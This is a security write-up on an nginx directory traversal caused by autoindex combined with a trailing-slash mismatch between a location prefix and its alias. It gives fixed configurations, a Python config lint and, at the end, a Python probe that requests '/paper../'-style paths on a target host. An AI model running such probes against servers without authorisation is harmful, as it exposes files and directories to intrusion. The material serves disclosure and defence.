nginx is a high-performance web server that is very widely deployed, and it is also frequently used as a reverse proxy.
Enabling autoindex in nginx together with a sloppy alias configuration creates a directory traversal vulnerability.
The configuration looks like this:
server {
    listen 80;
    server_name *.*.*.*;
    index index.htm index.html;
    root /home/wwwroot/www;
    access_log off;
    location /paper {
        alias /home/wwwroot/paper/;
        autoindex on;
    }
}
Note the trailing / in /home/wwwroot/paper/;
When you browse http://*.*.*.*:80/paper/, you get, as expected, a listing of the directory /home/wwwroot/paper/. But if you request http://*.*.*.*:80/paper../ instead, you get a listing of /home/wwwroot/: nginx replaces the matched prefix /paper with the alias and appends the rest of the URI, ../, so the resulting path is /home/wwwroot/paper/../, and because paper.. is a single URI segment nginx does not normalise it away before the alias substitution.
Tested on nginx 1.1.10. Sebug's recommendation:
Use one of the following configurations:
location /paper {
    alias /home/wwwroot/paper;
}
or:
location /paper/ {
    alias /home/wwwroot/paper/;
}
With the first form, /paper../ maps to /home/wwwroot/paper../, which does not exist; with the second, /paper../ no longer matches the location prefix at all and is served from root instead.
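The misconfiguration can also be caught from the configuration file itself, before any request is made. The following is an added example (not part of the original post, and not nginx's own code): a small Python 3 lint that extracts prefix location blocks that use alias, flags the pattern described above (location prefix without a trailing slash, alias with one), and models how nginx derives the filesystem path, which is the matched prefix replaced by the alias with the remainder of the URI appended, to show where a request for /paper../ would land. The sample configurations embedded in the script are constructed from the post's vulnerable block and the two recommended fixes; the regular expressions are a deliberate simplification that assumes unnested location blocks and skips exact-match (=) and regex (~) locations, where this substitution does not apply.

```python
#!/usr/bin/env python3
"""Lint nginx prefix locations for the alias / trailing-slash mismatch.

Added example; assumes a simplified config grammar (no nested location blocks).
"""
import posixpath
import re

# Constructed sample configs: the vulnerable block from the post and the two fixes.
VULNERABLE = """
server {
    listen 80;
    root /home/wwwroot/www;
    location /paper {
        alias /home/wwwroot/paper/;
        autoindex on;
    }
}
"""
FIXED_A = "location /paper { alias /home/wwwroot/paper; }"
FIXED_B = "location /paper/ { alias /home/wwwroot/paper/; }"

# Only plain prefix locations (optionally "^~"); "=" and "~" locations are skipped
# because nginx does not perform prefix substitution for them.
LOCATION_RE = re.compile(r'location\s+(?:\^~\s+)?(/[^\s{]*)\s*\{([^}]*)\}', re.S)
ALIAS_RE = re.compile(r'\balias\s+([^;\s]+)\s*;')


def find_alias_locations(conf):
    """Return (prefix, alias) pairs for prefix locations that use alias."""
    pairs = []
    for m in LOCATION_RE.finditer(conf):
        prefix, body = m.group(1), m.group(2)
        a = ALIAS_RE.search(body)
        if a:
            pairs.append((prefix, a.group(1)))
    return pairs


def map_request(prefix, alias, uri):
    """Model nginx alias handling: drop the matched prefix, append the rest to alias.

    Returns None when the URI does not match the prefix (the location does not apply).
    """
    if not uri.startswith(prefix):
        return None
    raw = alias + uri[len(prefix):]
    # Collapse "." and ".." components the way the filesystem will, keeping a
    # trailing slash so a directory request stays recognisable.
    return posixpath.normpath(raw) + ("/" if raw.endswith("/") else "")


def is_misconfigured(prefix, alias):
    """The post's pattern: prefix has no trailing slash but the alias does."""
    return not prefix.endswith("/") and alias.endswith("/")


def audit(conf):
    """Return (prefix, alias, path_reached_by_prefix_plus_dotdot) for each finding."""
    findings = []
    for prefix, alias in find_alias_locations(conf):
        if is_misconfigured(prefix, alias):
            findings.append((prefix, alias, map_request(prefix, alias, prefix + "../")))
    return findings


if __name__ == "__main__":
    for name, conf in (("vulnerable", VULNERABLE), ("fixed A", FIXED_A), ("fixed B", FIXED_B)):
        print(name, "->", audit(conf) or "no findings")
```

Running the script shows one finding for the post's block, mapping /paper../ to /home/wwwroot/, and none for either recommended fix; the same function can be pointed at a real nginx.conf read from disk.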
Next, the detection script I used in my own testing (written in Python):
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# nginx misconfiguration directory traversal check
# Date: 2019-01-14
from urllib.request import urlopen
from lxml import etree

# Location prefixes to probe for an autoindex listing.
pocs = ['logs', 'test', 'paper']


def nginx_test(ip, port):
    try:
        for poc in pocs:
            try:
                # Request the aliased directory; an autoindex page titled
                # "Index of /<poc>/" means autoindex is on for this location.
                res1 = urlopen("http://" + ip + ":" + port + "/" + poc, timeout=5)
                res_1 = res1.read()
                code1 = res1.getcode()
                cmp_str1 = 'Index of /' + poc + '/'
                html1 = etree.HTML(res_1)
                title1 = html1.xpath('//title')
                if code1 == 200 and title1 and cmp_str1 == title1[0].text:
                    # Request "/<poc>../": with the slash mismatch nginx maps this to
                    # the alias's parent directory and titles the page "Index of /<poc>../".
                    res2 = urlopen("http://" + ip + ":" + port + "/" + poc + "../", timeout=3)
                    res_2 = res2.read()
                    code2 = res2.getcode()
                    cmp_str2 = 'Index of /' + poc + '../'
                    html2 = etree.HTML(res_2)
                    title2 = html2.xpath('//title')
                    # The two listings must differ, otherwise both requests hit the same directory.
                    if code2 == 200 and title2 and cmp_str2 == title2[0].text and res_1 != res_2:
                        print("True")
                        return True
            except Exception as e:
                print('error:', e)
        return False
    except Exception as e:
        print(e)
        return False


if __name__ == '__main__':
    nginx_test("IP", "PORT")